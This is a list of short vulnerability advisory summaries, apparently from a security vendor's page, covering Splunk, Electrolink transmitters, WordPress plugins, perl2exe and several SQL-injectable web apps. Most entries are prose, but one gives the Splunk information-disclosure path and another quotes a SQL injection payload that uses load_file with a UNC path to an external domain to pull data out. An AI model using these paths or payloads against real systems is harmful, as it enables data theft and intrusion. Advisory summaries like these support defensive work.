Splunk version 9.0.4 is vulnerable to an information disclosure exploit. By appending /__raw/services/server/info/server-info?output_mode=json to a query, attackers can access sensitive information such as license keys.
An unauthenticated attacker can exploit Electrolink FM/DAB/TV Transmitter systems, affecting versions ranging from 10W to 30kW, leading to a remote Denial of Service (DoS) condition. By sending specially crafted requests, the attacker can disrupt the normal operation of the transmitters, potentially causing service interruptions or downtime.
The Flashcard Quiz App v1.0 is prone to SQL injection due to unsanitized user inputs directly concatenated into SQL queries. An attacker can manipulate the SQL query through the 'card' parameter in the URL, potentially leading to unauthorized actions on the database.
The Advanced Page Visit Counter plugin for WordPress version 8.0.5 is vulnerable to Stored Cross-Site Scripting (XSS) attacks. A high privilege user such as an admin can execute malicious scripts in the plugin's settings, even if the unfiltered_html capability is restricted.
perl2exe allows packing Perl scripts into native executables that use the 0th argument to unpack and execute a file. An attacker can leverage this to make the executable run another compiled executable by controlling the 0th argument, enabling them to escape restricted shell environments.
Client Details System 1.0 is vulnerable to SQL Injection through the 'uemail' parameter in the '/clientdetails/' endpoint. An attacker can exploit this vulnerability to compromise the application, access or manipulate data, or target the underlying database for further exploitation.
The Curfew e-Pass Management System 1.0 is vulnerable to SQL injection in the 'FromDate' parameter. By injecting a malicious payload into the 'FromDate' parameter, an attacker can manipulate the SQL query to execute arbitrary SQL commands. This vulnerability has been tested with a time-based blind technique using MySQL version 5.0.12.
The 'email' parameter in dawa-pharma-1.0-2022 is vulnerable to SQL injection attacks. By injecting a malicious payload like '+(select load_file('\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\lhc'))+', an attacker can execute a sub-query to call MySQL's load_file function with a UNC file path pointing to an external domain. This allows the attacker to retrieve sensitive information of clients and access server data.
The exploit bypasses Data Execution Prevention (DEP) in A-PDF All to MP3 Converter version 2.0.0 by utilizing HeapCreate, HeapAlloc, and some_memory_copy_function ROP chain. By manipulating specific parameters and memory allocations, an attacker can execute arbitrary code on the target system.
The Local File Inclusion vulnerability in WordPress WP Rocket Plugin allows an attacker to include local files from the target website, potentially exposing sensitive information like database credentials and enabling a complete database takeover. This issue was fixed in version 2.10.4.
Services By CQR